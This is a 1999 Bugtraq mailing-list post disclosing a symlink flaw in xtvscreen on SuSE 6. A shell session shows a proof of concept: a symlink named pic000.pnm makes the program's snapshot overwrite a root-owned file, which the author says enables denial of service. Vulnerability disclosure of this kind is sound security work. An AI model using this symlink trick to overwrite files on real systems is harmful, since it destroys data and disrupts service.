[9639] in bugtraq
xtvscreen and suse 6
daemon@ATHENA.MIT.EDU (Andre Cruz)
Thu Feb 18 17:13:32 1999
Date: Thu, 18 Feb 1999 15:54:24 +0000
Reply-To: Andre Cruz <afafc@CAMOES.RNL.IST.UTL.PT>
From: Andre Cruz <afafc@CAMOES.RNL.IST.UTL.PT>
To: BUGTRAQ@NETSPACE.ORG
You can use xtvscreen to overwrite any file on the system.
Xtvscreen has a function to capture a snapshot and will write it as
pic000.pnm, pic001.pnm, etc in it's working directory. It follows
symlinks.
root@korn:/tmp > ls -l exp
-rw-r--r-- 1 root root 4 Feb 18 15:42 exp
edevil@korn:~ > ln -s /tmp/exp pic000.pnm
edevil@korn:~ > xtvscreen
Sound mixer initialized !
Using Visual TrueColor
msize: 0x00640000
/*
Start->Capture goes here
Start->Snapshot goes here */
[1]+ Stopped xtvscreen
edevil@korn:~ > cd /tmp
edevil@korn:/tmp > ls -l exp
-rw-r--r-- 1 root root 453135 Feb 18 15:47 exp
edevil@korn:/tmp >
I don't know how to write arbitrary data to the file but it can be used
for DoS.
If this is already known I'm sorry.
---
Andre Cruz
afafc@camoes.rnl.ist.utl.pt
